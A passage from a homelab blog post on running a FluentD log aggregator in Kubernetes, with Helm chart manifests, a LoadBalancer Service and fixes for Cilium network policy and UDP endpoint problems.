</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;loki&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>: {}
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - {}
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/ingress</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">fluentd</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">app</span>: <span style="color:#ae81ff">fluentd</span>
</span></span></code></pre></div><p>This also already contains the config for the later FluentD access.</p>
<h1 id="fluentd-setup">FluentD setup</h1>
<p>Next step down the logging stack is my <a href="https://www.fluentd.org/">FluentD</a>
instance. I&rsquo;m using it in the role of a log aggregator. All logs produced in
my Homelab ultimately end up here. I&rsquo;ve kept all per-host log shippers as dumb
as possible and do all log massaging and aggregation in FluentD. It has served
me well in the past, since the days when I used Influx&rsquo; <a href="https://www.influxdata.com/time-series-platform/telegraf/">Telegraph</a>,
for a short while. It is highly efficient, serving all the syslogs and application
logs from my entire setup with 105 MB of memory and 1.7% of the CPU. The only
slightly weird thing is the configuration language, which has a decidedly XML
character, showing the time it was initially implemented. &#x1f609;</p>
<p>I&rsquo;m running FluentD as a singular instance, made available to my entire Homelab
via a LoadBalancer type Service. It has to listen on a number of ports as
well, for syslogs in both standard formats (<a href="https://datatracker.ietf.org/doc/html/rfc3164">RFC3164</a>
and <a href="https://datatracker.ietf.org/doc/html/rfc5424">RFC5424</a>) and TCP and UDP
as well as forwarding from the Nomad and k8s cluster.</p>
<p>I&rsquo;m building my own Helm chart here again. Mostly because the current image used
in the official chart
does not support all plugins I need and I&rsquo;m building my own image.
I&rsquo;m currently using the following plugins in my configs:</p>
<ul>
<li><a href="https://rubygems.org/gems/fluent-plugin-grafana-loki/">fluent-plugin-grafana-loki</a></li>
<li><a href="https://github.com/repeatedly/fluent-plugin-record-modifier">fluent-plugin-record-modifier</a></li>
<li><a href="https://github.com/repeatedly/fluent-plugin-multi-format-parser">fluent-plugin-multi-format-parser</a></li>
<li><a href="https://github.com/fluent/fluent-plugin-rewrite-tag-filter">fluent-plugin-rewrite-tag-filter</a></li>
<li><a href="https://github.com/tagomoris/fluent-plugin-route">fluent-plugin-route</a></li>
<li><a href="https://github.com/k63207/fluent-plugin-http-healthcheck">fluent-plugin-http-healthcheck</a></li>
<li><a href="https://github.com/fluent-plugins-nursery/fluent-plugin-kv-parser">fluent-plugin-kv-parser</a></li>
</ul>
<p>I will start with the Kubernetes setup here and go into details about the
actual FluentD config later.</p>
<p>One nice thing I was able to do in my Helm chart is the way the config files
are delivered. They are all put into a single ConfigMap, automatically, without
me having to adapt the Kubernetes manifests when adding a new config file.</p>
<p>In my chart root directory, I&rsquo;ve got a subdirectory <code>configs/</code>, where I store
all of the FluentD config files. Then I&rsquo;ve got the following ConfigMap:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">fluentd-conf</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>{{ <span style="color:#ae81ff">(tpl (.Files.Glob &#34;configs/*&#34;).AsConfig .) | indent 2 }}</span>
</span></span></code></pre></div><p>The magic is all in the last line. First, the <code>Files.Glob</code> function gets a number
of <code>Files</code> objects from the <code>configs/*</code> path. The <code>AsConfig</code> method then turns
each of those objects into the proper format to work in a ConfigMap&rsquo;s <code>data:</code>
key. This happens by formatting it like this, for a file at <code>configs/redis-k8s.conf</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">redis-k8s.conf</span>: <span style="color:#ae81ff">|                                                                                                  </span>
</span></span><span style="display:flex;"><span>  <span style="color:#75715e"># Log configuration for Redis on k8s                                                                                                                                                                                                    </span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>  <span style="color:#ae81ff">&lt;filter services.redis.redis&gt;                                                                                    </span>
</span></span><span style="display:flex;"><span>    @<span style="color:#ae81ff">type parser                                                                                                   </span>
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">key_name log                                                                                                   </span>
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">reserve_data true                                                                                              </span>
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">remove_key_name_field true                                                                                     </span>
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">&lt;parse&gt;                                                                                                        </span>
</span></span><span style="display:flex;"><span>      @<span style="color:#ae81ff">type regexp                                                                                                 </span>
</span></span><span style="display:flex;"><span>      <span style="color:#ae81ff">expression /^[0-9]+:[XCSM] (?&lt;logtime&gt;[0-9]{2} [A-Za-z]{3} [0-9]{4} [0-9]{2}:[0-9]{2}:[0-9]{2}.[0-9]{3}) (?&lt;level&gt;[\.\-\*\#]) [^$]+$/                                                                                               </span>
</span></span><span style="display:flex;"><span>      <span style="color:#ae81ff">time_key logtime                                                                                             </span>
</span></span><span style="display:flex;"><span>      <span style="color:#ae81ff">time_type string                                                                                             </span>
</span></span><span style="display:flex;"><span>      <span style="color:#ae81ff">utc true                                                                                                     </span>
</span></span><span style="display:flex;"><span>      <span style="color:#ae81ff">time_format %d %b %Y %H:%M:%S.%N                                                                             </span>
</span></span><span style="display:flex;"><span>    <span style="color:#ae81ff">&lt;/parse&gt;                                                                                                       </span>
</span></span><span style="display:flex;"><span>  <span style="color:#ae81ff">&lt;/filter&gt;                      </span>
</span></span></code></pre></div><p>Finally, <code>tpl</code> is called on the result, as I&rsquo;m referencing Helm chart values in
some of the config files. The only thing I&rsquo;m a bit worried about is the maximum
size of a Kubernetes resource, which may be hit at some point with this approach.</p>
<p>Speaking of the Helm chart values, here they are:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">commonLabels</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">fluentd</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">syslog</span>: <span style="color:#ae81ff">5144</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">syslogTls</span>: <span style="color:#ae81ff">6514</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">logShippers</span>: <span style="color:#ae81ff">24225</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">netconsole</span>: <span style="color:#ae81ff">6666</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">health</span>: <span style="color:#ae81ff">8888</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">k8sLogs</span>: <span style="color:#ae81ff">24230</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">mountDir</span>: <span style="color:#ae81ff">/fluentd/log</span>
</span></span></code></pre></div><p>Again relatively simple, as I can configure most things by just changing the
templates directly. The <code>netconsole</code> here is a port for the kernel&rsquo;s netconsole,
which I&rsquo;m using for my netbooting hosts to see the early boot process without
having to connect them. That post has been sitting in my repo as a draft since
I started the k8s migration plan back in December. &#x1f605;
The <code>logShippers</code> port is used by the Fluentbit instances deployed on Nomad,
while the k8s logs are send to the <code>k8sLogs</code> port.</p>
<p>There&rsquo;s again a scratch volume involved, which is used for on-disk buffers
before logs are send over to Loki, so that there&rsquo;s no loss when the FluentD
container is suddenly killed:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">PersistentVolumeClaim</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scratch-volume</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storageClassName</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">accessModes</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">ReadWriteOnce</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">storage</span>: <span style="color:#ae81ff">4Gi</span>
</span></span></code></pre></div><p>And here is the Deployment for FluentD:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">apps/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Deployment</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">fluentd</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">replicas</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">app</span>: <span style="color:#ae81ff">fluentd</span>
</span></span><span style="display:flex;"><span>      {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>      {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>      {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">strategy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">type</span>: <span style="color:#e6db74">&#34;Recreate&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">app</span>: <span style="color:#ae81ff">fluentd</span>
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>        {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>        {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/config</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/config.yaml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">automountServiceAccountToken</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">securityContext</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">fsGroup</span>: <span style="color:#ae81ff">1000</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">fluentd</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">registry.mei-home.net/homenet/fluentd:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scratch</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: {{ <span style="color:#ae81ff">.Values.mountDir }}</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/fluentd/etc</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">200m</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">500Mi</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">HL_NODE_NAME</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">valueFrom</span>:
</span></span><span style="display:flex;"><span>                <span style="color:#f92672">fieldRef</span>:
</span></span><span style="display:flex;"><span>                  <span style="color:#f92672">fieldPath</span>: <span style="color:#ae81ff">spec.nodeName</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">livenessProbe</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">httpGet</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.health }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">path</span>: <span style="color:#e6db74">&#34;/&#34;</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">initialDelaySeconds</span>: <span style="color:#ae81ff">15</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">periodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">syslog-tcp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.syslog }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">syslog-udp</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.syslog }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">UDP</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">syslog-tls</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.syslogTls }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">log-shippers</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.logShippers }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">k8s</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.k8sLogs }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">netconsole</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">containerPort</span>: {{ <span style="color:#ae81ff">.Values.ports.netconsole }}</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">UDP</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scratch</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">scratch-volume</span>
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">config</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">fluentd-conf</span>
</span></span></code></pre></div><p>The only new thing I learned here is how to access fields from the Pod spec
via environment variables, which I use to put the node name into the <code>HL_NODE_NAME</code>
env variable. I later use this to add the node name to FluentD&rsquo;s own logs.</p>
<p>Next, the service. This is of type LoadBalancer, as FluentD does not only handle
the internal cluster logs, but also the logs from all of my hosts.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Service</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">fluentd</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/public-service</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">external-dns.alpha.kubernetes.io/hostname</span>: <span style="color:#ae81ff">log-aggregator.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">io.cilium/lb-ipam-ips</span>: <span style="color:#e6db74">&#34;10.86.55.66&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">type</span>: <span style="color:#ae81ff">LoadBalancer</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">externalTrafficPolicy</span>: <span style="color:#ae81ff">Local</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">selector</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">app</span>: <span style="color:#ae81ff">fluentd</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ports</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">syslog-tcp</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: <span style="color:#ae81ff">514</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">syslog-tcp</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">syslog-udp</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: <span style="color:#ae81ff">514</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">syslog-udp</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">UDP</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">syslog-tls</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.syslogTls }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">syslog-tls</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">log-shippers</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.logShippers }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">log-shippers</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">k8s</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.k8sLogs }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">k8s</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">TCP</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">netconsole</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">port</span>: {{ <span style="color:#ae81ff">.Values.ports.netconsole }}</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetPort</span>: <span style="color:#ae81ff">netconsole</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">protocol</span>: <span style="color:#ae81ff">UDP</span>
</span></span></code></pre></div><p>While setting up the service, I realized that I had forgotten the <code>syslog-udp</code>
entry in the port list. I added it, but the service did not show any Endpoints
for that particular port:</p>
<pre tabindex="0"><code>Port:                     syslog-udp  514/UDP
TargetPort:               syslog-udp/UDP
NodePort:                 syslog-udp  31268/UDP
Endpoints:
</code></pre><p>I tried to fix this by recreating the Pod, but to no avail. I finally found
<a href="https://ben-lab.github.io/kubernetes-UDP-TCP-bug-same-port/">this blog post</a>,
which proposed not just deleting the Pod, but also the Deployment - and that
did the trick.</p>
<p>Another issue I hit came after I switched the syslog-ng configs for all of my
hosts over to the new FluentD on k8s. All hosts worked well - safe for all of
my k8s nodes! None of them was able to connect to the FluentD service.
After quadruple-checking my Firewall config, I finally had another facepalm
moment. My CiliumNetworkPolicy looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;fluentd&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>: {}
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - {}
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">fluentbit</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">fluentbit</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEntities</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">world</span>
</span></span></code></pre></div><p>The issue with this config is: <code>world</code> doesn&rsquo;t mean &ldquo;absolutely everybody&rdquo;. It
only means &ldquo;everybody outside the k8s cluster&rdquo;. So my desktop, all
of my Nomad cluster nodes and my baremetal Ceph nodes were allowed - but the
k8s nodes were not! I&rsquo;m wondering how often I will read through <a href="https://docs.cilium.io/en/latest/security/policy/language/#entities-based">the Cilium docs</a>
before this migration is over. &#x1f605;
The solution is to add <code>remote-node</code> <em>and</em> <code>host</code> to the <code>fromEntities</code> list,
like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">fromEntities</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#ae81ff">world</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#ae81ff">remote-node</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#ae81ff">host</span>
</span></span></code></pre></div><p><code>remote-node</code> allows all cluster nodes which are not running the FluentD Pod
access, while <code>host</code> is specifically the node which is currently running the Pod.</p>
<p>But that was still not all the problems I had with the syslogs setup. In my old
config, I had configured FluentD to check the IP address of the sender and look
it up in DNS to set the <code>host</code> field of the log message. For the life of me,
I cannot remember why I would do such a thing.
The problem was, again, with the k8s hosts. They were showing up with IPs, not
their proper hostnames. I recognized the IPs as the ones which Cilium assigns
to the <code>cilium_host</code> interface it creates. Those IPs are not routable in my
wider network and there are no corresponding PTR records in my DNS.</p>
<p>To realize that that was my problem, I had to break out Wireshark yet again.
This is becoming a theme in this migration. Looking closer at the messages,
